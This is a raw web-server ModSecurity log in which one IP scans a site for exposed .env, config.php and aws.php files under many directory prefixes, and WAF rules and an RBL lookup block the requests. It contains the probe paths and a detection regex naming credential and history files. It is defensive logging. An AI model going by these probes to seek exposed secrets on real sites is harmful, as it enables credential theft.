[Tue May 26 14:49:39.360361 2026] [security2:error] [pid 648203:tid 648358] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqrEQDDtxJNiDrdTqWAAAAJ4"]
[Tue May 26 14:49:39.361086 2026] [security2:error] [pid 648203:tid 648346] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqrEQDDtxJNiDrdTqVwAAkiQ"]
[Tue May 26 14:49:39.361763 2026] [security2:error] [pid 648203:tid 648365] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqrEQDDtxJNiDrdTqYgAAAKU"]
[Tue May 26 14:49:39.368322 2026] [security2:error] [pid 648203:tid 648366] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqrEQDDtxJNiDrdTqWwAAAKY"]
[Tue May 26 14:49:39.448535 2026] [security2:error] [pid 648203:tid 648246] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/back-api/.env"] [unique_id "ahVlq7EQDDtxJNiDrdTqkAAA9So"]
[Tue May 26 14:49:39.482043 2026] [security2:error] [pid 648203:tid 648224] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/back-end/.env"] [unique_id "ahVlq7EQDDtxJNiDrdTqkwAA9RQ"]
[Tue May 26 14:49:39.491798 2026] [security2:error] [pid 648203:tid 648331] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/back/.env"] [unique_id "ahVlq7EQDDtxJNiDrdTqlQAA9X8"]
[Tue May 26 14:49:39.493236 2026] [security2:error] [pid 648203:tid 648321] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/backend-api/.env"] [unique_id "ahVlq7EQDDtxJNiDrdTqlgAA9XU"]
[Tue May 26 14:49:39.493239 2026] [security2:error] [pid 648203:tid 648263] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/backend/.env"] [unique_id "ahVlq7EQDDtxJNiDrdTqmAAA9Ts"]
[Tue May 26 14:49:39.499896 2026] [security2:error] [pid 648203:tid 648408] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlq7EQDDtxJNiDrdTqjgAAANA"]
[Tue May 26 14:49:39.501403 2026] [security2:error] [pid 648203:tid 648339] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlq7EQDDtxJNiDrdTqjwAAAIs"]
[Tue May 26 14:49:39.505986 2026] [security2:error] [pid 648203:tid 648445] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlq7EQDDtxJNiDrdTqigAA9S4"]
[Tue May 26 14:49:39.568061 2026] [security2:error] [pid 648203:tid 648445] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlq7EQDDtxJNiDrdTqmgAA9QI"]
[Tue May 26 14:49:39.569818 2026] [security2:error] [pid 648203:tid 648445] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlq7EQDDtxJNiDrdTqmQAA9Q4"]
[Tue May 26 14:49:39.571569 2026] [security2:error] [pid 648203:tid 648445] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlq7EQDDtxJNiDrdTqnQAA9Sk"]
[Tue May 26 14:49:39.572694 2026] [security2:error] [pid 648203:tid 648445] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlq7EQDDtxJNiDrdTqmwAA9Sg"]
[Tue May 26 14:49:39.574492 2026] [security2:error] [pid 648203:tid 648445] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlq7EQDDtxJNiDrdTqlwAA9X8"]
[Tue May 26 14:49:39.575611 2026] [security2:error] [pid 648203:tid 648445] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlq7EQDDtxJNiDrdTqngAA9T0"]
[Tue May 26 14:49:39.616231 2026] [security2:error] [pid 648203:tid 648343] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlq7EQDDtxJNiDrdTqfQAAAI8"]
[Tue May 26 14:49:39.640472 2026] [security2:error] [pid 648203:tid 648445] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlq7EQDDtxJNiDrdTqoQAA9Tc"]
[Tue May 26 14:49:39.642315 2026] [security2:error] [pid 648203:tid 648445] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlq7EQDDtxJNiDrdTqogAA9SI"]
[Tue May 26 14:49:39.642962 2026] [security2:error] [pid 648203:tid 648257] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/backup/.env"] [unique_id "ahVlq7EQDDtxJNiDrdTqrAAA9TU"]
[Tue May 26 14:49:39.643040 2026] [security2:error] [pid 648203:tid 648254] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/be/.env"] [unique_id "ahVlq7EQDDtxJNiDrdTqrQAA9TI"]
[Tue May 26 14:49:39.648727 2026] [security2:error] [pid 648203:tid 648262] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/beta/.env"] [unique_id "ahVlq7EQDDtxJNiDrdTqrwAA9To"]
[Tue May 26 14:49:39.669033 2026] [security2:error] [pid 648203:tid 648221] [remote 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlq7EQDDtxJNiDrdTqqQAA9RE"]
[Tue May 26 14:49:39.695451 2026] [security2:error] [pid 648203:tid 648445] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlq7EQDDtxJNiDrdTqqgAA9RU"]
[Tue May 26 14:49:39.699730 2026] [security2:error] [pid 648203:tid 648445] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlq7EQDDtxJNiDrdTqqwAA9SA"]
[Tue May 26 14:49:39.722888 2026] [security2:error] [pid 648203:tid 648449] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlq7EQDDtxJNiDrdTqtAAAAPk"]
[Tue May 26 14:49:39.726815 2026] [security2:error] [pid 648203:tid 648419] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlq7EQDDtxJNiDrdTqtQAAANs"]
[Tue May 26 14:49:39.789098 2026] [security2:error] [pid 648203:tid 648258] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/client/.env"] [unique_id "ahVlq7EQDDtxJNiDrdTqywAA9TY"]
[Tue May 26 14:49:39.790586 2026] [security2:error] [pid 648203:tid 648272] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/cms/.env"] [unique_id "ahVlq7EQDDtxJNiDrdTqzgAA9UQ"]
[Tue May 26 14:49:39.876352 2026] [security2:error] [pid 648203:tid 648286] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/config.php"] [unique_id "ahVlq7EQDDtxJNiDrdTq3AAA9VI"]
[Tue May 26 14:49:40.308990 2026] [security2:error] [pid 648203:tid 648374] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlq7EQDDtxJNiDrdTqwwAAAK4"]
[Tue May 26 14:49:40.312310 2026] [security2:error] [pid 648203:tid 648379] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlq7EQDDtxJNiDrdTqxgAAALM"]
[Tue May 26 14:49:40.326547 2026] [security2:error] [pid 648203:tid 648419] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlq7EQDDtxJNiDrdTqxAAAANs"]
[Tue May 26 14:49:40.326582 2026] [security2:error] [pid 648203:tid 648420] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlq7EQDDtxJNiDrdTqxQAAANw"]
[Tue May 26 14:49:40.332357 2026] [security2:error] [pid 648203:tid 648405] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlq7EQDDtxJNiDrdTqwQAAAM0"]
[Tue May 26 14:49:40.334153 2026] [security2:error] [pid 648203:tid 648445] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlq7EQDDtxJNiDrdTqzAAA9Vg"]
[Tue May 26 14:49:40.336861 2026] [security2:error] [pid 648203:tid 648445] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlq7EQDDtxJNiDrdTq2wAA9WY"]
[Tue May 26 14:49:40.338838 2026] [security2:error] [pid 648203:tid 648357] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlq7EQDDtxJNiDrdTq1gAAAJ0"]
[Tue May 26 14:49:40.339286 2026] [security2:error] [pid 648203:tid 648445] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlq7EQDDtxJNiDrdTq2QAA9Uo"]
[Tue May 26 14:49:40.340026 2026] [security2:error] [pid 648203:tid 648336] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlq7EQDDtxJNiDrdTqxwAAAIg"]
[Tue May 26 14:49:40.347142 2026] [security2:error] [pid 648203:tid 648406] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlq7EQDDtxJNiDrdTq0gAAAM4"]
[Tue May 26 14:49:40.350246 2026] [security2:error] [pid 648203:tid 648403] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlq7EQDDtxJNiDrdTq5AAAAMs"]
[Tue May 26 14:49:40.353152 2026] [security2:error] [pid 648203:tid 648416] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlq7EQDDtxJNiDrdTq0wAAANg"]
[Tue May 26 14:49:40.354905 2026] [security2:error] [pid 648203:tid 648354] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlq7EQDDtxJNiDrdTq5QAAAJo"]
[Tue May 26 14:49:40.357467 2026] [security2:error] [pid 648203:tid 648370] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrLEQDDtxJNiDrdTq6gAAAKo"]
[Tue May 26 14:49:40.382948 2026] [security2:error] [pid 648203:tid 648430] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlq7EQDDtxJNiDrdTq2gAAAOY"]
[Tue May 26 14:49:40.477689 2026] [security2:error] [pid 648203:tid 648273] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/config/.env"] [unique_id "ahVlrLEQDDtxJNiDrdTrAQAA_EU"]
[Tue May 26 14:49:40.487824 2026] [security2:error] [pid 648203:tid 648314] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/config/aws.php"] [unique_id "ahVlrLEQDDtxJNiDrdTrCAAA_G4"]
[Tue May 26 14:49:40.496330 2026] [security2:error] [pid 648203:tid 648311] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/config/config.inc.php"] [unique_id "ahVlrLEQDDtxJNiDrdTrDgAA_Gs"]
[Tue May 26 14:49:40.504915 2026] [security2:error] [pid 648203:tid 648302] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/config/config.php"] [unique_id "ahVlrLEQDDtxJNiDrdTrEgAA_GI"]
[Tue May 26 14:49:40.542257 2026] [security2:error] [pid 648203:tid 648452] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrLEQDDtxJNiDrdTrAgAA_EA"]
[Tue May 26 14:49:40.544252 2026] [security2:error] [pid 648203:tid 648383] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrLEQDDtxJNiDrdTrAAAAALc"]
[Tue May 26 14:49:40.548328 2026] [security2:error] [pid 648203:tid 648452] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrLEQDDtxJNiDrdTrCgAA_E8"]
[Tue May 26 14:49:40.549117 2026] [security2:error] [pid 648203:tid 648452] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrLEQDDtxJNiDrdTrBgAA_GA"]
[Tue May 26 14:49:40.554892 2026] [security2:error] [pid 648203:tid 648396] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrLEQDDtxJNiDrdTrCwAAAMQ"]
[Tue May 26 14:49:40.560346 2026] [security2:error] [pid 648203:tid 648378] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrLEQDDtxJNiDrdTrDAAAALI"]
[Tue May 26 14:49:40.562006 2026] [security2:error] [pid 648203:tid 648376] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrLEQDDtxJNiDrdTq_wAAALA"]
[Tue May 26 14:49:40.567371 2026] [security2:error] [pid 648203:tid 648440] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrLEQDDtxJNiDrdTrDwAAAPA"]
